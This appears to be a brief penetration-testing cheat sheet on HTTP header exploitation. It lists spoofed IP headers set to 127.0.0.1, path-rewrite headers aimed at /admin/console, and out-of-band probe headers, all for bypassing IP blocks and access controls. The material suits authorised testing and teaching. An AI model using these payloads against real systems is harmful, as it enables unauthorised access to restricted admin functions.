Header Exploitation

Headers are used on all websites, but in some instances, an administrator or developer may have misconfigured the application and allow certain headers which it shouldn't. Not only that but some proxies, when handling the requests before they arrive to the backend, may interpret the headers differently and in result, give you access to pages you aren't supposed to access.

What Can I Do With Headers?

In some cases if certain headers are enabled, this could for example lead to:

• Bypassing an IP block
• Redirect the user to a different web application
• Bypass restrictions and, for example, reach admin panels that normally isn't accessed
• Make a malicious web application to force a user of a victims application to share data to the malicious web application

Tools

Yes, there is a Burp Extension called Param Miner to help brute force those hidden easter-egg headers. Nikto works too but in my experience, too many false positives.

Header Examples

Keep in mind, some IP related headers may be able to have a value of a domain eg. www.google.com or www.internal.example.com.

IP-related Headers

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded:  127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Forwarded-Server: 127.0.0.1
X-Forwarded-Scheme: 127.0.0.1
X-HTTP-Host-Override: 127.0.0.1
Forwarded: for=127.0.0.1

Path-related Headers

X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console

Other headers

X-Host:
X-Real-IP:
X-Forwarded-For: collaborator.com
X-Forwarded-Host: collaborator.com
X-Originating-IP: 127.0.0.1
X-Forwarded-Server:
X-Forwarded-Scheme:
X-HTTP-Host-Override:
Forwarded:
Origin: https://example.com